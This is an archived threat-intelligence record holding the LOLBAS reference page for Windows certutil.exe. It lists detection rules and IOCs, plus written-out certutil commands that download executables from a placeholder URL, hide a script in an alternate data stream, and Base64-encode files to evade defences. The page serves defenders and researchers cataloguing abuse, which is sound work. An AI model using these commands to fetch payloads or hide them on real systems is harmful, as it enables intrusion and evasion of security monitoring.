{
	"id": "695e8784-83a7-49fc-aeac-eac249be74fe",
	"created_at": "2026-04-06T00:21:15.646806Z",
	"updated_at": "2026-04-10T13:12:58.395676Z",
	"deleted_at": null,
	"sha1_hash": "8b64ea9a9de4469ffde669e4f22c6fc60c1a426b",
	"title": "Certutil on LOLBAS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63252,
	"plain_text": "Certutil on LOLBAS\r\nArchived: 2026-04-05 18:48:54 UTC\r\n.. /Certutil.exe\r\nWindows binary used for handling certificates\r\nPaths:\r\nC:\\Windows\\System32\\certutil.exe\r\nC:\\Windows\\SysWOW64\\certutil.exe\r\nResources:\r\nhttps://twitter.com/Moriarty_Meng/status/984380793383370752\r\nhttps://twitter.com/mattifestation/status/620107926288515072\r\nhttps://twitter.com/egre55/status/1087685529016193025\r\nhttps://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/\r\nAcknowledgements:\r\nMatt Graeber (@mattifestation)\r\nMoriarty (@Moriarty_Meng)\r\negre55 (@egre55)\r\nLior Adar\r\nAdam (@hexacorn)\r\nSomeTestLeper (@SomeTestLeper)\r\nDetections:\r\nSigma: proc_creation_win_certutil_download.yml\r\nSigma: proc_creation_win_certutil_encode.yml\r\nSigma: proc_creation_win_certutil_decode.yml\r\nElastic: defense_evasion_suspicious_certutil_commands.toml\r\nElastic: command_and_control_certutil_network_connection.toml\r\nSplunk: certutil_download_with_urlcache_and_split_arguments.yml\r\nSplunk: certutil_download_with_verifyctl_and_split_arguments.yml\r\nSplunk: certutil_with_decode_argument.yml\r\nIOC: Certutil.exe creating new files on disk\r\nIOC: Useragent Microsoft-CryptoAPI/10.0\r\nIOC: Useragent CertUtil URL Agent\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Certutil/\r\nPage 1 of 4\n\nDownload\r\n1. Download and save an executable to disk in the current folder.\r\ncertutil.exe -urlcache -f https://www.example.org/file.exe file.exe\r\nUse case\r\nDownload file from Internet\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\n2. Download and save an executable to disk in the current folder when a file path is specified, or\r\n%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\\u003chash\u003e when not.\r\ncertutil.exe -verifyctl -f https://www.example.org/file.exe file.exe\r\nUse case\r\nDownload file from Internet\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\n3. Download and save an executable to %LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\\u003chash\u003e .\r\ncertutil.exe -URL https://www.example.org/file.exe\r\nUse case\r\nDownload file from Internet\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows 10, Windows 11\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Certutil/\r\nPage 2 of 4\n\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\nTags\r\nApplication: GUI\r\nAlternate data streams\r\n1. Download and save a .ps1 file to an Alternate Data Stream (ADS).\r\ncertutil.exe -urlcache -f https://www.example.org/file.ps1 C:\\Windows\\Temp\\file.ext:ttt\r\nUse case\r\nDownload file from Internet and save it in an NTFS Alternate Data Stream\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1564.004: NTFS File Attributes\r\nEncode\r\n1. Command to encode a file using Base64\r\ncertutil -encode file.ext file.base64\r\nUse case\r\nEncode files to evade defensive measures\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1027.013: Encrypted/Encoded File\r\nDecode\r\n1. Command to decode a Base64 encoded file.\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Certutil/\r\nPage 3 of 4\n\ncertutil -decode file.base64 file.ext\r\n2. Command to decode a hexadecimal-encoded file.\r\ncertutil -decodehex file.hex file.ext\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Certutil/\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Certutil/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://lolbas-project.github.io/lolbas/Binaries/Certutil/"
	],
	"report_names": [
		"Certutil"
	],
	"threat_actors": [],
	"ts_created_at": 1775434875,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8b64ea9a9de4469ffde669e4f22c6fc60c1a426b.pdf",
		"text": "https://archive.orkl.eu/8b64ea9a9de4469ffde669e4f22c6fc60c1a426b.txt",
		"img": "https://archive.orkl.eu/8b64ea9a9de4469ffde669e4f22c6fc60c1a426b.jpg"
	}
}